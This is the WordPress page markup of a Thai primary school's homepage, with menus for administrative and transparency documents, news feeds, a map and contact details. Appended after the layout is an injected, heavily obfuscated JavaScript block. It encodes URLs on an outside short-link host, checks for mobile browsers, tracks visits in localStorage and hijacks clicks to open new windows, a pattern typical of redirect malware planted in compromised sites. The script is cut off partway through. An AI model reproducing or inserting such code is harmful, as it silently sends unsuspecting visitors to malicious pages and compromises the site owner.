-->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":1,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 